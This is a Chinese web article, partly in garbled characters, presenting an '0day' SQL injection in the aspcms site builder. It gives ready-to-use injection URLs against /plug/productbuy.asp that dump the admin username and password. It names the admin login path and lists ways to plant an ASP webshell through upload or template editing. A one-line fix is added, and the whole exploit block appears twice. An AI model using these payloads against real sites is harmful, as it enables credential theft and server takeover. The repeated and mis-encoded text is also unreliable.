aspcms企業(yè)建站系統(tǒng)0day漏洞介紹
發(fā)布時間:2011-09-26 01:04:08 作者:佚名
我要評論

aspcms企業(yè)建站系統(tǒng)0day 2.0以上通殺2011-08-14 19:21aspcms開發(fā)的全新內核的開源企業(yè)建站系統(tǒng),能夠勝任企業(yè)多種建站需求,并且支持模版自定義、支持擴展插件等等,能夠在短時間內完成企業(yè)建站。
漏洞出現(xiàn)在
/plug/productbuy.asp
對接收的參數(shù)id沒有進行過濾而導致的注入漏洞
注入后的頁面有跳轉,所以要快,建議用快捷鍵復制
爆用戶名
/plug/productbuy.asp?id=2+union+select+1,2,LoginName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,
26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1
這是爆ID=1的賬戶名,如果發(fā)現(xiàn)權限不夠可以往后試2,3,4...........
爆密碼
/plug/productbuy.asp?id=2+union+select+1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,
26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1
后臺登錄地址:/admin/login.asp
后臺拿shell
1、直接上傳.asp;x
2、系統(tǒng)配置信息
3、模版管理新建1.asp模板,內容寫馬的內容.
修復方法: id用cint(request("id"))
/plug/productbuy.asp
對接收的參數(shù)id沒有進行過濾而導致的注入漏洞
注入后的頁面有跳轉,所以要快,建議用快捷鍵復制
爆用戶名
/plug/productbuy.asp?id=2+union+select+1,2,LoginName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,
26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1
這是爆ID=1的賬戶名,如果發(fā)現(xiàn)權限不夠可以往后試2,3,4...........
爆密碼
/plug/productbuy.asp?id=2+union+select+1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,
26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1
后臺登錄地址:/admin/login.asp
后臺拿shell
1、直接上傳.asp;x
2、系統(tǒng)配置信息
3、模版管理新建1.asp模板,內容寫馬的內容.
修復方法: id用cint(request("id"))
相關文章
192.168.1.1進入路由器默認的用戶名和密碼是多少 常用路由默認密碼大全
本文把路由器常用的品牌的默認的密碼都發(fā)出來.供大家參考2012-05-28- 世界上沒有絕對安全的系統(tǒng),即使是普遍認為穩(wěn)定的Linux系統(tǒng),在管理和安全方面也存在不足之處。我們期望讓系統(tǒng)盡量在承擔低風險的情況下工作,這就要加強對系統(tǒng)安全的管理2009-08-13
運用動態(tài)安全域保護企業(yè)網(wǎng)的方法
網(wǎng)絡安全域是指同一系統(tǒng)內有相同的安全保護需求、相互信任,并具有相同的安全訪問控制和邊界控制策略的子網(wǎng)或網(wǎng)絡,相同的網(wǎng)絡安全域共享一樣的安全策略2012-07-20全面鞏固企業(yè)的內網(wǎng)安全的10個招數(shù)
幾乎所有企業(yè)對于網(wǎng)絡安全的重視程度一下子提高了,紛紛采購防火墻等設備希望堵住來自Internet的不安全因素。然而,Intranet內部的攻擊和入侵卻依然猖狂。事實證明,公司內2012-05-14- 這里要說的就是是否掃描壓縮文件,我的建議是不掃描,因為掃描他們會花去大量的時間,即時里面有病毒,也需要先解壓出來,就是直接運行也要解壓到臨時文件夾,這個時候麥咖2009-10-08
萬博企業(yè)網(wǎng)站管理系統(tǒng)注入漏洞(MemberLogin.asp)
這個注入漏洞發(fā)生在html/MemberLogin.asp文件里,在Include下有NoSqlHack.Asp文件也沒調用,呵呵,就有了我們利用的地方了2011-11-19- 網(wǎng)絡安全是一門涉及計算機、網(wǎng)絡、通訊、密碼、信息安全、應用數(shù)學、數(shù)論、信息論等多種學科的綜合性學科,涉及面極廣,而且不斷更新和發(fā)展2013-03-20
- Nmap這些年來功能越來越多, 它也是從一個高效的端口掃描器開始的,并且那仍然是它的核心功能,它把端口分成六個狀態(tài):open(開放的),closed(關閉的),filtered(被過濾的),u2008-10-08
加強計算機的網(wǎng)絡安全級別控制設置的方法 防止非法攻擊
網(wǎng)絡安全永遠是預防大于被動的殺毒.防患于未然2012-05-31怎么采用DirectAccess來保護企業(yè)的網(wǎng)絡安全
現(xiàn)在微軟在Windows Server 2008 R2和Windows 7中引入了DirectAccess新功能,它是專為替代VPN連接而設計的下一代網(wǎng)絡連接。而且不需要用戶手動連接VPN,只需打開瀏覽器,系2016-07-06